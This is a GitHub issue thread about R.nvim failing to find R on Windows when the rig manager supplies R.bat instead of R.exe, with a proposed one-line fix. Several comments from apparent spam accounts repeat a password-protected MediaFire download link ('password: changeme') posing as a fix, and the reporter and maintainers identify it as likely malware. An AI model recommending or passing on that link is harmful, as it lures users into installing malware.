### ISSUE TITLE
Could not detect R on Windows

### ISSUE THREAD

**Issue by hongyuanjia** [R-nvim/R.nvim#222]
I use https://github.com/r-lib/rig to manage R installations on Windows. It writes registry keys to store the R version and path information. R.nvim checks the Windows Registry at `HKEY_LOCAL_MACHINE\SOFTWARE\R-core` to get the path of R installed and set the `config.R_cmd` to `R.exe` if `external_term` is not set.

However, rig creates `R.bat` for `R.exe` (but not `Rgui.bat` and `Rterm.bat` for `Rgui.exe` and `Rterm.exe`), which is directed to the `R.exe` of the default version it sets. This is the content of `R.bat` for me:
```
::4.4.1
@"C:\Program Files\R\R-4.4.1\bin\R" %*
```

This leads to an error when opening R files:

```
Could not find R path in Windows Registry. If you have already installed R, please, set the value of 'R_path'.
Error executing vim.schedule lua callback: Vim:E475: Invalid value for argument cmd: 'R.exe' is not executable
stack traceback:
        [C]: in function 'jobstart'
        ...uanjia/AppData/Local/nvim-data/lazy/R.nvim/lua/r/job.lua:128: in function 'start'
        ...jia/AppData/Local/nvim-data/lazy/R.nvim/lua/r/server.lua:398: in function 'check_nvimcom_version'
        ...jia/AppData/Local/nvim-data/lazy/R.nvim/lua/r/config.lua:851: in function <...jia/AppData/Local/nvim-data/lazy/R.nvim/lua/r/config.lua:851>
```

The simplest solution here is to remove the `.exe` for Line 566. https://github.com/R-nvim/R.nvim/blob/1fb55e5ac50129cebc1d38d88c943a4efe97d60a/lua/r/config.lua#L560-L567

This solution works for me.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by hongyuanjia** [comment]
What? Has GitHub already been polluted by malware?

**Comment by hongyuanjia** [comment]
Not really. Still get error:

```
Could not find R path in Windows Registry. If you have already installed R, please, set the value of 'R_path'.
R_app executable not found: 'Rterm'
[Server] "Neovim" window not found
"R" exited with status 1
```

**Comment by PMassicotte** [comment]
> What? Has GitHub already been polluted by malware?

?

**Comment by hongyuanjia** [comment]
> > What? Has GitHub already been polluted by malware?
> 
> ?

When I opened issue, some users commented just after few secs. See:

![图片](https://github.com/user-attachments/assets/a9c8ccd6-8d7c-41b4-976f-0e6b4ee950a3)

And also which I deleted:

![图片](https://github.com/user-attachments/assets/2b8d64b1-e81e-49de-9e5d-8389a5ffff4a)

**Comment by PMassicotte** [comment]
Wow. Hope this is being monitored by GitHub.

**Comment by jalvesaq** [comment]
> When I opened issue, some users commented just after few secs. See:

The same on zotcite yesterday.
